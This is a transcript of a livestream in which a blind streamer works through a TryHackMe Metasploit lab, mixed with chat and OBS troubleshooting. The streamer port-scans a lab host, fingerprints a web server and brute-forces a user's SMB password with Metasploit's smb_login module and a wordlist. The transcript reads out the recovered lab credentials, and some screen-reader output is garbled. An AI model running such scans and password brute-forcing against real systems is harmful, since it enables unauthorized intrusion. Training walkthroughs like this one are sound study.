Hey. Oh, hi. Hello, Dante. I saw your message. Welcome in. Oh, hi, Crescent. Welcome in, welcome in. I'm, in a proper IC null fashion, doing very, very many things at the very last moment, like promoing and actually making sure Chrome's open and all that stuff. It's great. Well, music is done, so let's turn that off before we get smashed by copyright. I have no idea what's going to come next, so yeah, let's not go too nuts. I will say beforehand, I do have to blip out for about 5 to 10 minutes at 10 because work, and I need to do things and actually make money. So it's not. I never said I was in it for the money in Twitch. I do still have a full-time day job that I sometimes have to attend to, and this is one of those days where I cannot just not for the duration of my stream. So yeah, that's a kind of thing. I'll just put like some music on or something, and you guys will have to sort of talk amongst yourself for a couple of minutes while I sort that out. Shouldn't be too long though, so it's a pretty simple thing. On the whole, more Metasploit today. We're gonna have to see how stuff goes. Actually, no stream closed captioner. I'm gonna have to turn you off because possibly at least captions might just be coming in straight to your whatever you're using's captioning engine. Although that is primarily a Twitch plugin that I have going, so I'm not sure how well it will work on Restream, but I did get like native OBS captions, so with a little bit of luck, at least for my gaming channel, they'll have captions on Twitch again. No idea how Restream handles that internally, so we'll have to see. But yeah, captions are something that's still being worked on. I got Braille in the sense that I still have my own little tiny Braille display that I found a cable for that's at least working. It's the on again, off again cable we had last week. I lost it for a while and I found it again. So how's you guys has been? I've been lugging a mattress around all day. It's like a 2 meter by 160 centimeters mattress. It's fucking massive, and it's like 80 pounds or 90 pounds or something. So that was fun. Had to do some hard labor. Says the geek who never ever does anything with his hands. Anyway, yeah, Metasploit today. I'm gonna see if I can like get the entire screen going at this point. Just like make a display capture. Hey, hello on Twitch. I'm just kill a couple things here so I can actually just do a display capture. That way we have NVDA's highlighters and everything, all sorts of other cool fancy things that we can do. So let's just see if we can make that happen. And then, like I said, once I have to go and do other things for a bit, I'll just switch it to the starting soon stream thing again. I don't have a Zerziax or IC Null is taking a break visual currently, so it'll just be the starting soon again bit, which is fine. Just closing the last bits, and then I can like set my entire screen to be visible, and we'll work it out from there. Now, the tricky bit about me doing that, I actually had 70 windows open when I started this, before I started the stream. 20 minutes before I started the stream, I had 70 windows open. Now I have 20. So I feel I did good. Just closing a couple more things over and then we can start. The thing with like working several jobs and doing several things in hobbies is that a lot of the time what happens is you get a shit ton of things that you have open in any given time. Like any given, I have like 2 or 3 different browsers open. I'll have like Office things open. I'll have Teams open because I must, and not because I like. Believe me. Yeah, it's fantastic. I have several windows open in Explorer. We're just closing all those down, and then I'll add a fancy thing, and I'll warn you to look away for a bit while I'm in OBS, because OBS's like preview is going to be previewed in the preview, and it's a messy, like, I don't want to look at that for too long because it gets really trippy. So yeah, that's what we're doing today. Just gonna keep going with what we were doing, honestly. Like, honestly, yeah, we were doing a Metasploit room. We had to stop in the middle because I was done, pretty much. Should be a bit more practical today. We have like more stuff to do, hopefully. If not, that would be really sad, but I'm pretty sure that we will, because we did like the whole intro thing, and I don't think they have that much more theory to toss at us. So it should be a bit of MSF Venom, it should be a bit of NSF Console, just doing a bunch of different things. Should be all good. Should have a heck of a time. So just so we have everything visible and everyone can see everything they want to see, I'm just gonna, like I said, do the entire display. That way when I switch windows, you will too. And it just makes it so I don't have to do as much window handling and things, which is just a lot easier for me. I'm just sorting out all the login bits right now while I'm talking, and then once I've done all that, I'm gonna switch the screen on. Actually, I can do that now. You guys can see the last bits. Let me create a thing. Here you go. Look away now if you don't want to have an interesting experience. All right. Gotta make sure that my... Yeah, it's lovely. All right. You guys should be all good. Oh, gee, let's do it one up. So I think there might be something in that source. There you go. No. I hit the wrong button. Move up. There you go. Yeah, that's where I want it. That's perfect. Okay, beautiful. You guys still have the logo, the cameras, and all the things. That should all still work. And you have a display capture. Let's get out of OBS so we don't drive people nauseous. Hang on. Let me do it. There you go. Okay, it's safe to look now. Let me real quick enable the VPN. Otherwise, we will not get far. And then once I've done that, I'll start doing cool stuff, as it were. So here's a question for people that are like watching. I got a comment once on one of my videos that said, hey, like I'm 16 minutes in and nothing has happened yet. Like maybe you should edit those out. And I'm like, what do people think about that? Like I do understand that people's attention span generally isn't what it used to be. And I understand that, you know, these things can get really long. On the other hand, I've always been in the position like, this is a stream archive. Like they're not meant to be scripted or edited. It's literally just what happened while it was being recorded. Hey, Thierry Barre, welcome in. I'm curious what people think about that. Like, I really don't mind clipping those bits out if that's really something that people feel strongly about. It's more work for me, but it's certainly worth trying at some point. Like, just experimenting with. I don't know, I've just never really been all that keen on the idea because it's like, yeah, it's not an edited video. It's just a stream thing. So, sort of had a question about it. I was curious what people thought. Let me set the ZPN up here. I have so many things in here. I see no Twitch. There you go. Yeah, that's what I would do too. Like if you're, you know, I've been thinking about chapterizing the videos too to at least give people that, but that's actually harder than it should be. A lot of the times you get, unless you have to go into the archives after the fact and then find the spots, and then I think there is a way in the YouTube editor to do it, but it's I don't know. I might as well clip bits out if people just aren't, you know, interested in watching the preamble. I can understand that. That makes sense to me. Well, anyway, we have Chrome open. Right. Yeah, that's what I figured. Yeah, that's really. I think if I do scripted videos, that's a different story. Like if it's a scripted video and like half of it is, hey yo, it's your boy. I going to do the YouTube thing and I'm going to talk about myself for 5 minutes. Oh, did you know I had merch? You can go to my Patreon. My Ko-Fi is right over there. I'm cool. I weigh so and so many kilograms and I'm this tall. Okay, let's talk about Metasploit. Yeah, okay, I get that that's fluff that doesn't need to be there, and you'll never be caught dead doing that. Like I will do a little intro. Like when I'm thinking of making some scripted videos, and they're going to be very much the format of I talk for a bit to talk about what the video is going to be about. There's going to be like maybe 10 seconds of branding and then the rest of the video, and that's it. Like there's not going to be a bunch of like sponsored segments and things, for one, because I don't have sponsors, but also just I don't like that kind of video very much. I usually skip past it myself, so I wouldn't want to inflict it on others. But these are like literally, they're not in any way edited, or they're just raw footage of me sitting here doing stuff. So I'm like, I don't mind. If people really want me to get rid of it, I can. It's just a little odd, a bit of a strange request. All right, well, let's see. Is it going to tell us recent rooms? The most recent rooms we were doing was that second Metasploit one. So we'll just... Yeah, that's what I figured. Metasploit exploitation. Here's the room. We have 17% of the room done, apparently. And now, you know, if I were to... Dr. Sniper, hello, I think you're new. Welcome in. Dr. Sniper, that's a new one. I hope Dr. Sniper's having a good day. How does that go? Like, do you just like scalpel like really small like surgical procedures like from afar? Because that sounds cool. Dr. Sniper. Anyway, yeah, we're doing more try hack me stuff today, and you have the entire display. So if I switch, you'll switch. I'll try with that little thing here. My name is Blindly Coding because I am literally blind, Dr. Sniper. I am a fully blind streamer. I use a screen reader, which sounds sort of kind of like this. And that is my portal to what I'm doing. I don't have a monitor connected. I don't have anything of the sort going on. So literally this is me being a blind hacker, blind programmer, blind techie. And I'm doing these streams because I want to show people that that's possible, and also where the accessibility issues are and what people should be doing better. So that is why the channel is called Blindly Coding. I do coding as well. Like when I started the channel about 10 years ago, it was like one Hello World coding video all the way back. You can still find that if you look hard enough. And when I started doing these streams, I just decided to keep the name and just, you know, it's now also Blindly Hacking. Deal with it. There's also going to be Blindly Musicking at some point. There's blind gaming streams on here. So there's a lot of this. Blindly Coding just stuck, and it's easy to say to people. So I just left it be. Let me slow that speech down so people can actually hear it if required. Beautiful. All right. So yeah, we'll see what it wants us to do. I'll just start up all the things. We probably will need the attack box, so I'll make sure that's running. Let's see. Dr. Sniper, did I answer your question adequately? So now you can definitely ask more. There is an AMA tag on this, so feel free to ask whatever you like. Start attack box. There you go. Let's see. What part of it did we do this? We filled in this first question. This second has a... Does it have a start machine button? It does. Let me start that up. We'll probably need that later. We did this as well, if I remember correctly. Yeah, 5. And then using the relevant scanner, what was the button for this again? Yeah, what net BIOS name can you see? Well, none, because I'm blind. But it's ACME IT support was the last question thing we did. And that takes us to the next question that we didn't get to yet. It's asking me, what is running on port 8000? Hey, thank you. That might be fun, Dr. Sniper. Like, happy to collaborate up at some point and just, you know, bundle our forces. Yeah, I've been doing hacking off and on since 2021, I would say, when the COVID pandemic hit. I got like a 3-month voucher from a person that was handing them out at the time on Twitter, when Twitter was still somewhat okay. And I've sort of been doing it off and on since then. No, Kristen says speech is not meant to be coming through right now. Let's see. We need to retrace our steps. We did a couple of things and then we stopped. So we have to essentially do the same thing we did before. Let's log into the attack machine. Where's the attack machine? Ugh. I didn't even see that cookie thing. There you go. Let's get rid of that. That's out of the way now. Very nice. Speech can actually come through now so you guys can hear what it is I'm doing. Let's see. I need the info for the attack. Oh, screw off, you blaster. There we go. It'll pop up about wanting to see my clipboard. You don't get to see my clipboard. Screw off. Come on. Don't ask me more than once. Get lost. Thank you. 3 times in a row. You need to learn what no means. You can tell this is coded by a guy. Oh! Anyway. Right? Like 3 times in a freaking row. I just escaped out 3 times in a stupid row. What the hell? Let's see. Info. I need the stuff. Alright, so we have the public IP, which I'm not going to reveal because people might stream snipe me. That's not very nice. And we are in the VPN, so you can just use this 10.10.228.183. Just copy that in. So you guys can see how I actually do this. I go into run dialog, I do CMD. I probably didn't even have to do that. I could have just done SSH from there, but who cares? SSH root. Let me turn that off. I had like to turn characters on for a demo the other time, and I forgot to turn it off, and it actually really bothers me when I start paying attention to it. Don't want to hear every character I'm typing. Very annoying. Yeah, the authenticity, your mom. Come on, let's go. Oh, I have to say yes explicitly because I have to really know that I know what I'm doing. There you go. Password.
User password :4ba7c8391e9f3b05.
No, there you know. 4ba.
4ba. Windows 32cmd.x.
Okay. Yep. Let me paste this in. Whoop.
System information as of Tuesday, September.
Yeah. You're a very good boy. Now let's do what we need to do. MSF console. Let's go.
This copy of Metasploit framework is more than 2 weeks old. Consider running update to the latest.
Yeah. We might if you're good. We'll see. So while that loads, let's find the information we need for the actual target machine, like the AP for that. Let's get out of that. We don't need that anymore. 10.10.221.83 is the attack box. Where's the attack box for the other thing?
Metasploit has a numbers button unavailable start machine. Out of region button.
Hey, what's that doing? It's not showing me the stuff. It's just hanging out and being gray.
Button unavailable start machine.
Let me refresh this page. It seems to be a little upset. Let's see if I can. There we go. Does that work better? Let's have a look here. I'm turning that speech down just a tiny bit. Oh, I can't. Blah. Oh, let me fix that real quick because you guys get to see some stream maintenance here.
Out of region. Find dialog. Go tab mixer tab configure. Route out of region tab mixer tab configuration tab.
Configuration. Slider 1. Back to game, and now we can slide this down a tiny bit. There we go. Much better. What's with this? What the hell happened here? Oh, I thought it showed the. Let's see, info. Am I just forgetting where this was? Oh, there we go. Target information. Here we go. Okay. So we're looking at Metasploit scanning. Target IP 10.10.10.23. That's easy. Well, that's good. Like, yeah, well, it's not good, but it's good that you know, in spite of your physical situation, you're still able to do what you want to do. That's good. Do your thing, man. It's important. Yeah, like I've seen people who have similar things going on where like maybe one of their fingers is missing entirely, or just 2 fingers might be sort of bonded together. That happens. So yeah, that can happen, and that's fine. Actually, I could just cheat. Let's cheat. Let's cheat on this one because I actually don't want to do the whole entire Metasploit thing. We can actually cheat and say... What is it? 8,000? 10, 10, 10, 23. That made this. Wait, what?
Go ops star approval fire saved firebot message list 3 2 clickable 922 cam back that made the speech way too low.
That made the speech way too low. Okay, we'll make it louder. There you go.
Route 10-10-2 route 10-10-220-1
Better. There you go.
Bob set up target failed to determine route to 8000 0.0.31.64 blank set a starting map 7.60 https //map.org at 2024-09-17-2023 BST.
That is weird.
Fire route 10-10-10.
Like, we have the command line
Set up target starting map 7
visible. It should be visible.
Firebot fire try acne metasploit try
I mean, there's Chrome. I can show that off at least, unless it's like not maximized or something. Let's see. Some windows get weird with OBS. Okay, well, this isn't working. Okay, well, I guess you'll have to believe me when I say that we're doing doing a port scan. Then that's super strange. You should just see the entire thing. No idea why that wouldn't render. Anyway, what was we doing? Port scan. If we go to Chrome, what was that thing we had to do? Let's see, port scanning. That is weird though. Like, is nothing working right now? That's. Hang on, let me. I thought it'd be fixed by now, but I guess not. Let me see.
Firebot, viewer attack, cam, sound alert, voice mod, Chrome, game capture, display capture.
Something goes screwy? Let's have a look.
2.0 profile, group, combo box auto, combo box at 1080.
Yeah, looks fine.
Start window, search window.
Very weird. Well, I can delete and re-add this source. Sometimes OBS gets weird.
Audio mix sources with.
That is really unless. No, I thought maybe my screen reader was doing that, but no, that's so weird. Huh. Let me have a look at this. Maybe there's some weird.
Ops 30.2.0 profile combo capture cursor checkbox force SDR checkbox OK button can't default group combo.
That is so strange.
Capture method combo box DXGI desktop duplication collapsed down combo box Windows 10 1903 and up collapsed down.
Alright, let's set this to this. Did this do anything different?
OK button ops 30
like, you got more now? It's kind of hard to determine from my end because I just see things working, so it's super weird that you guys aren't. Oh. Huh. Yeah, worst case, what I can do is I guess just go back to the black screen. Right, let me delete this source and re-add it for some reason. Like, it worked before. OBS is weird sometimes. Like, it should not be as flaky as it is, but it really can be. I'm just gonna make a new one. There you go. There you go. If that doesn't work, what I'm gonna have to do is switch back to how I used to do it while just capturing the window.
List toolbar add remove drop move down button move source add move down left click.
Like, if that did not fix, let me know and I'll just do what I usually do. Okay, so let's go to a different thing. Here's browser. Browser work. All right.
Metasploit has a number of modules to scan open ports on the target system and network. You can.
Oh yeah. Well, let's hope it stays that way. Like, whenever that happens again, please let me know. I think it's happening when I go into my command line for reasons that are beyond me, but yeah. I'm gonna try that now. Now I'm in my command line. Is that visible at all? Search port scan.
Port scan. Matching module. LAN interact LAN.
Hey, look at that. It's working for reasons entirely beyond my understanding.
0 auxiliary slash scanner slash port scan slash bounce normal no F1 auxiliary slash scanner slash nat port scan normal no nat PMP external port scanner. 2 auxiliary slash scanner slash SAP router port scanner normal no SAP router port scanner. 3 auxiliary slash scanner slash port scan slash Christmas normal no TCP XMOS port scanner.
Okay, so we have some port scanners here that we need to use.
Firewall scanner.
TCP, AC key firewall scanner, no.
5 auxiliary slash scanner slash port scan slash TCP normal no TCP port scanner.
I appreciate that. Thank you, Dr. Sniper. Like, it is something you get used to, honestly. Like, you do this a lot, obviously, and you just know what to do.
5 MSF6.
Let's try this one, the port scanner TCP. I'm relatively sure 8080 over 8000 is going to be a web server of some kind. Should run on TCP. I'm not expecting UDP. So let's do show options, see what they want here. What do we got? Timeout threads, our hosts, ports. Jitter, I don't really care about being stealthy right now, so let's do, what is it? Set ports 8000.
8,000 ports equals greater 8,000.
Set roasts 10, 10, 10, 23, run.
Plus 10.10.10.23 dash 10.10.
What?
Auxiliary module execution completed.
Auxiliary module execution, what?
10.10.10.23 scan 1 of 1 hosts 100% complete. Plus 10.10.10.23 dash 10.10.10.23 colon 8000 TCP open. Lang MSF6 auxiliary scanner slash port scan slash TCP greater run.
Okay, so it's open, but we can't. Let's actually cheat. Let's just we're making this so much more difficult on ourselves than we probably need to be. Let's just go to that URL. Let's just go see what's in here. 10, 10, 10, 8,000.
8,000 backslash access denied.
Aww. What was there to try? Anything in source?
View source colon checkbox not checked 1 access denied 2 lang.
That is so mean. It's worth a try though. Okay, so we need the banner. We need to somehow check version. Like maybe let me actually look at the text for this. See if they recommend something because I don't remember what they want here.
Try act search port scan. MSF6 greater search port scan matching module 16 equals number name disclosure date rank.
Yeah.
Auxiliary slash scanners norm auxiliary slash normal no auxiliary description auxiliary slash scanner slash http slash wordpress pin back access.
I need to just do this with Braille because this speech is driving me nuts. Let's see. Port scan. I mean, they want you to use Metasploit for this, so it's kind of cheating. I do know what you're saying. You know, do whatever you want, but particularly when you are fully blind, and a lot of the times, just the way they want you to do it isn't accessible. We might run into that when we get to more Windowsy hosts. We'll have to see. But yeah, like they do want you to do it a certain way, and I do that a lot in the cyber. What is it? Advent of Cyber thing that we did last year. That was pretty fun. I had to do a lot of weird stuff to get around some of their weird, problematic setups, like figuring out how to get at the. Let's see, SAP router port scanner. Okay.
MSF6 greater lang. Port scanning modules will require you to set a few options. Port scan options. MSF6
yeah, so it tells us about what we need to use. This makes sense. Blah blah blah. What do you got? Courtesy delay, jitter. There's not really a check versions port, at least in the thing that I saw. So I'm seeing if there's a particular module that I want us to use here. Currency ports. Blah blah blah.
Scans. You can directly perform map scans from the console prompt as shown below faster. Using map from the console prompt. MSF6 greater map 10.1.
So yeah, they say just use nmap, which we could do that, I suppose. Because I think nmap by default does do basic version detections. Let's just try that. Oh, spelling is hard.
Map. SS.
10, 10. Let's not even give it a port. It just does the most standard. No, it wouldn't do the right port if we do that. Just give it 8,000.
8,000 star exec map.
Like, it had a problem with me doing that the other time. Let's see if it works better this time. Yeah, here it is. Failed to determine route to 8,000. Yeah, but it gives me this error. See, I was trying that before and it wouldn't let me do it because it says it failed to determine route to 8,000 003164, which is not at all what I gave it. So I'm not sure where it's even getting those arguments from.
Map 7.60 HT. Interrupt. MSF6 auxiliary scanner slash port skin slash TCP greater map SS 10.10.10.
I think I know what's going on. I think it's an order thing. That's P-8000. I think the target needs to be at the very end, otherwise it shits.
23 star exec set up target failed to determine.
No, it doesn't like it. Okay, weird.
Space stats 0 o'clock 10.
Oh wait, it's doing stuff.
Since don't scan timing lang. Since stats set up target face stats 0 o'clock 10 lapsed 0 hosts completed 1 up 1 undergoing since don't scan. Since the blank bottom. Yeah,
but like, you're allowed to still be in Metasploit. That is fine. It shouldn't have a problem. But maybe it's doing some extra stuff because of that. Like, I don't mind making another terminal and just seeing if that will fix it. We shouldn't need to. It's doing the scan though. Like, it's scanning it, just taking forever about it. This says it'll take like an hour 54 minutes. Let's not. Hang on. Let me try this from outside of Metasploit, see if that works better. That's not okay. Let's give it. What is it? Let's just do it. I think you don't even need to do SV for this. I think it wants really basic information, which I think you just get if you just do it like this. Let's see if it's happier outside of Metasploit.
Set up target failed to determine route to 8,000 lang.
Okay, yeah, it's going to do that every time. Yeah, I've been doing that. I think it's -p dash and then the number. Maybe that's the wrong thing. Let me see. Over here they do SS.
Open MSRPC open on 0 MSF6 star exec map MSF6 MSF 10.10.12.22.
Yeah, so here they give an SS. They don't even do a port scan. I mean, I could just leave that out honestly because they want 8,000, which I mean, look at that in Fireball. I need to see your exact syntax for that one. Okay, no dash at the end. Oh shit. Okay, that will be why it's taking so long then. My bad, sorry. Been a minute since I used that man map. Honestly, I don't really use it that often. Which I really should be using it more. But hey, there you go. Let's see what this does. Let's go. Hey, that was a lot faster. So that's cool. It's not really what I wanted. So it says HTTP-ALT. I'm guessing that's what it wants. Let's see. Come on. HTTP dash. I don't think that's enough characters. What's the hint? What is the penny user's SMB pass button? I think the hint is broke. Okay, come on. Hello, I asked for a hint. Left click. What is the penny use button submit? We don't get to have a hint. Okay, or unless it's like at the bottom here or something weird like that. Nah. Okay. Yeah, that's definitely not what we're seeing. 5-star. Huh. Yeah. I think I might have to do that, Dante, like either that or SV, like Dr. Sniper said. Yeah, we'll just do A, see what gives us better information. This is a lot faster with just one port, so we're fine. I already saw that after we're going to have to dive back into MSF console because it wants us to do some SMB scans. but we'll see. Dash A.
Starting map 7.60.
Yeah, you start on away. You do what you do. Let's go.
Bottom. Starting map 7 blank.
And now it's super slow.
Bottom, root map done.
There it is. Okay.
Please report any incorrect blank. 10.35
So
RTT address tracer out. Blank. Network distance 1. No exact OS 0.6.39. Aggressive OS guess warning. OS scan MAC address 0 HTTP title. Site doesn't have a title. Text / plain. HTTP server header web /1.21.
webfs/1.21. That sounds right. Okay.
Firebot. Try hack.
Let's do that. webfs/1.21. Is that correct?
21. Alert whoop whoop. Your answer is correct. Try hack me Metasploit exploitation document 23%.
Oh yeah. Okay, what's the next one?
Answer.
Noise.
What is the penny user's SMB
What is the penny user's SMB password? Use the word list mentioned in the previous task. Pretty sure I left that word list somewhere in a file. Where'd it go? There. I never throw stuff away, and this is why. Okay, here's my little note word-like thing that we're gonna need in a minute. I think they gave us the name of a module to use with SMB scan, so let's find that first. Because I've actually never done SMB enumeration from Metasploit, so that's kind of cool. All right, what does this say? Metasploit offers several useful auxiliary modules that allow us to scan specific servers. Below is an example for the SMB. Especially useful in the corporate network, the SMB_enum shares and SMB version. But please spend some time to identify scanners that the SMB version, the Metasploit version. Okay. So let's have a look, because we probably want enumeration in the void. Let's see. So that's version that they're showing us here. We don't really need version. We need a password for an existing user that we know of. So we would need to... Let's go back into MSF console and just see what we do. MSF console, bring it back in, blah, blah, blah. Yes, this is an old version, deal with it. This is ephemeral. If I update it, it's just going to get wiped out when I close the thing anyway, so...
starting the Metasploit framework console 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 starting the...
Hey guys, I think it's starting the Metasploit's framework console. I think that's what it's doing. I could be wrong. All right, let's see. SMB, what do we got? We need some kind of brute forcer.
Interact with land 136
Oh. I didn't expect there to be that many.
100.
Audio description was like 100 and something results.
2 auxiliary /server /capture /SMB normal no authentication 1 exploit /ask /browser /safari file 0 exploit /multi /http
No, we don't want to exploit quite yet. We just want to get enumerations.
/capture /SMB normal no authentication capture SMB 3 post /linux /music.
Yep.
4 exploit /linux /miscellaneous /cisco rv3 on 5 auxiliary 6 5 auxiliary /scanner /http /citrix nerd traversal 6 auxiliary /scanner /smb /invocate /comex 2018.
Okay, so there's a lot of things here. Let's use that SMB enum shares for now. SMB enum shares. Yeah, there's only one of that. Good. So use 0. Let's have a look. Does that have a word list parameter? I think it might, from what I saw last time. Let's have a look. Spider share, spider profile, show files. Yeah.
SMB pass no to password. SMB domain dot no to Windows domain to use for auth. SMB pass no to password for the specified username.
We can give it a password. Can we brute force? No, not with this one. Let me Google this. I'm curious. Yeah. Your mother. Duck, duck, go for the win. Why is my caps lock on? Let's have a look. Metasploit. Brute force SMB password. Why is my caps lock still on? There we go. Look at that, GitHub pages. I trust GitHub pages, random people on the internet. Yeah. Graphic user list. Yeah. Password list. Graphic plan. We will be using the auxiliary /scanner/smb/smb login module to. Okay, SMB login is the one we want. Okay, that's fair. Let's go find that one. SMB underscore login. That's all I needed to know. Thank you. Let's see. Search SMB login. And this is honestly, like, some people will be like, oh, why'd you Google that? You should just know everything and the entire hacker Wikipedia should just be in your brain. No. Programming doesn't work like that. Hacking doesn't work like that either. Please use the resources you have access to. You're not bad for doing that. Let's see. If you a couple things. If you use them all the time, of course you're going to remember them and just use them for muscle memory. But this kind of stuff, if you've not done it in a while, please just Google it. It's fine. So they probably want us to use this one, and yeah. Yeah, that could work too. But let's do it with this though. Let's see how far we get. Show options. Module option. Plan. For post true yes. User file. User as pass false. User file. No file containing usernames. 1 per line. User as pass false. No try. The username was the password for all users. All right. So we have a user pass file. We have a user file. We have SMB user. We can set that. Let's set that first. But first, let's see what we got for. This looks like it's in alphabetical order. So there's probably going to be a pass file. Yep. Okay, so we now pretty much have everything we need for this attack. We need to do set pass file. Yeah, that's really helpful. That way you don't have to type the entire stupid long name. It says it at the bottom, but it's easy to miss. So this is our pass file. We also have the username, so we can set SMB user as being Penny. Let's try that. Show set SMB user Penny. Let's see, was that with a capital letter or not? I don't remember. Oh. You know what I think of that?
Your mother.
That's what I think of that. Let's see. This one. Close that. We don't need that anymore. Let's see. Whoopa. What is the penny? Okay, it's penny with a small p. Penny with a small p. All right. Let's see. Yeah, SME user is Penny. And roasts. Well, our hosts. Set our host is 10, 10, 10, 23. Go do. Let's see what we get back. This should work in theory. MSF-10.10.10.23:445. MSF: option validate error. The following options failed to validate. Pass file. Uh-oh. Lang. No, you're fine. Like, send as many messages as you like. Be as chatty as you like. Oh yeah, I got a whole entire Twitch channel for games. Xerxiax on Twitch is my game like this. ZRSI. That's my Twitch name for games. I play a bunch of different ones that have enough accessibility for me to be able to play. So you can check that out on Twitch. There's also some archives on this YouTube channel that you're on. So yeah, you can check it out there. Basically, it's a lot of listening to the sound design of the game. Sometimes there's mods or just features that make it more doable depending on what game. It's very game dependent how I play them. But yeah, there's quite a few that I play on a somewhat regular basis. Wednesday and Saturday is game streams, and then Tuesdays are this, basically. I don't tend to stream to YouTube for games. I don't actually know why I don't do that. Like, I just started doing that for the IC Null streams, and I could probably also do it on YouTube. It's not harming anything to do so, but I'll have to see. Yeah, that's a thing I sometimes do. What was I gonna do? Oh yeah. Why is my show options? What broke?
Oh. Options, module option, land. SMB are close direct proxies, no reserve aspects, DP, detect any domain, fault, detect edit, pass, reserve, pass file, /share, /wordlist, /metasploit room, /metasploit word.
User /wordlist, metasploit room, metasploit wordlist.txt. Oh, I see what happened. There's a thing at the end of that. It's like some kind of Unicode character. I'm not sure what that is. A backslash or a tab? We'll have to see. Let's try it again. Pass file. We'll need 2 S's. Thank you. And then we'll paste this in a shush. Yeah, there's a space at the end of that. That's probably why it broke. So I'm noticing from my calendar that I have to jet in like 10 minutes or so for a few minutes. Like I announced, I'm gonna have to like play some music while I do some work stuff. Like I said, it's gonna be like 5 to 10 minutes. You guys can just talk amongst yourself for a bit. If you have questions, you can just drop them in chat. I'll respond to them when I'm back. Shouldn't be too long. I really don't think it'll be too long. Let's try this again. Run.
10.10.1.0.23:445 MSF: option validate error the following options.
Now what? What's wrong? Let me just paste this in the notepad. See if there's any weird characters that it for some reason doesn't like. There's that space, but I got rid of that. This should be right. Huh. That's better. Oh. No, let's just hope that it stops at some point. Okay, it finished. It says that password of host 100% complete. Okay, what's the password? Leo1234. There you go. Yeah, I don't know what happened. That was weird. Leo1234 is the password. Okay. Leo1234, the most fantastic password in the universe. Do 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 do. All right, let's put this in and go. Oh yeah. We got root, except not really. We got a user. That's enough for now, I guess. Yeah, I'll keep going. Let's see how much time I have left. Shush. Yeah, I got 5 minutes. Leroy Jenkins. Gotta love him. That guy's apparently still famous. Like, he still goes to game cons and things. Cool. All right. Well, I can read some of this before we continue. The Metasploit database. While it is not required when interacting with a single target on Try Hack Me, an actual penetration test engagement will likely have several targets. Yeah, probably. Metasploit has a database function to simplify project management and avoid possible confusion when setting up parameter values. Oh, very cool. Yeah, I did the beginner path when I first started out. You will first need to start the PostgreSQL database, which Metasploit will use with the following command. So yeah, Postgres, Ruby, Metasploit uses a lot of things that just exist on their own thing. Writing stuff in Ruby, there's a site called Ruby Foo, like Ruby FU. Not fuck you, just FU. And that has some really interesting exercises on like building a port scanner in Ruby, stuff like that. So if you're interested in how that works, it's definitely worth checking that website out. There's also a book. I'm not sure how up to date it all is because Ruby moves and the book didn't, but a lot of it should just still give you a lot of starting points to start on. You can just chat GPT the rest if you want. Oh, nice. Yeah, so Metasploit is one of those, do it and go kind of things. Yeah, I like the essential ones. Okay, so it's a system control start PostgreSQL. That's not a Metasploit thing. System control is just how you handle services in modern Linux. So you could run that in Metasploit, but you could probably just do it outside as well. And PostgreSQL is just a database for a number of different things. Like it's also used for web apps a lot, or I think even AI like things sometimes. So that's good to know. Yeah, let's keep on reading. Keep on reading. Keep on reading. Then you will need to initialize the Metasploit database using the msfdb init command. So it'll say starting PostgreSQL. Yep, it shows us off like this little screenshot. That's not actually a screenshot. That shows us how to do it. And then msfdb init. Yep, thank you. Appreciate that. Crescent keeping me honest by telling me when I have to actually do work that it makes me money. Because you guys don't pay me enough. No, that's fine. Creating database user MSF. So honestly, the only problem I always have with databases is that I always forget like what the default logins are. It's like, in this case, it's MSF that it just makes for you, so you can just log in as that user. And there's a whole thing where sometimes there's a password and sometimes there's not a password. Sometimes the password is Postgres, sometimes it isn't. It's the whole entire thing. And every time I build a new web app, I have to look it up again. Like, how do you get into a Postgres again? What was it again? Damn it. So it's a bit of a hate-love relationship with these kinds of tools. Okay. Let's have a look-see. It always returns nil. Well, that's fine. So at this point, I'm gonna just really quickly prepare my be right back bits. So just get you some music and stuff to listen to while I'm gone. Let's see. Got to use our stream beats. Stream beats are fantastic for streamers because they have varied music. Yes, it would. Let's do the EDM. We're doing hacking skills. Let's do EDM music. Why not? There we go. Play. Oh yeah, better when I'm high. See, this is a good start. I haven't even started work yet. Okay. How am I do this? I need to do this some certain way. Let me do. Okay. Oh shit. Well, there goes the Brill. It does that. It's fine. Let me just turn it off for a second. Yeah. Cease your chicanery. There we go. Put this down. Okay. So while that's going on, let's see, where are we at? 57. So in 3 minutes, I need to actually be useful for a few seconds rather. Let me really quickly shift my speech away to me so that doesn't get yammering at you guys, because I want to hear what I'm doing. That would be very nice. All right, so I'm gonna talk to you guys as let's not put that on there for too long. Let's just leave it on here for now. Yeah, well, it shouldn't be long. I just have to explain some rules, it looks like. So it should not be too hard. What was I gonna do? Oh yeah. Now in a second, I'm gonna switch to my starting soon screen, which means I won't have microphones. So that'll be when I'm just out and having music playing for a little bit. Let's see, log into this. Do. There we go. All right. I am a accessibility auditor at a big company that I can bring the music up a little. In a little bit, I'll turn the music up a tiny bit. I am a accessibility auditor, which means I do a lot of accessibility testing. I give people training and things of the nature, stuff like that. And I do that currently for various companies. One is an airline and one is a Microsoft-owned company. So there you go. And there's like a little meeting thing where we like talk about certain issues, and there's apparently one thing that they need my help with, so I'll just make sure that that was the first one we do, and then I zip right out after that, and I'll come back to you guys. It can be so simple sometimes. All right. There we go. Okay. So turning the music up a tiny bit, and I'm gonna be right back. Hey. Everybody gone? Oh. Nice. Hope the music was good. I'm just fishing out the braille cable so we can get back to it. Let's have a look here. Move this here, plug this in, press this button, do this here, plug this in. Oh yeah, dancing Dante. Look at that. Okay. Oh yeah, excellent. Hey, welcome in. Should probably get rid of that. And go back here. All right. See if I can get Braille to work. Braille's being a little annoying. Welcome in, new person. I hope you weren't waiting long. We had a little interlude of work stuff that had to be done. Oh, come on. There we go. Braille, please. Thank you. All right, so that's enough music for now. Let me say proper hello to the new person. What's your name? Particule de Dieu. Bonsoir, particule de Dieu. Excellent. I hope you have a good evening, particule de Dieu. How did your day go? How are you having fun? And how did you find me? Excellent. Yeah, going well too. I'm just doing some stuff here. I speak a bit of French. I speak a bit of a lot of different languages: Polish, German, Dutch. Dutch is my native language. So, you know, we're in that little thing where we only speak several words of every language because we're just a small country that talks to everyone, and we just have a bunch of economic migrants and things, and you just pick up things: Turkish, Japanese, whatever you want to speak. You just get some words in, and I'm a language nut, so I go look into how these languages work and what they do and what they don't do. It's a whole entire thing. All right, so we ranted about PostgreSQL and how it always falls over. Let me turn this on. Okay, there we go. So databases, if guys aren't aware, are the backbone of many systems. Like it's behind every WordPress blog. It's behind every web application. Oh, InfoSec streams. Dat is geen probleem. Pas de problème. Basically, InfoSec streams is something that Fixit42 dumped me on at some point, and I still get people coming in from there. So it's a cool. I like that. I like that I'm on 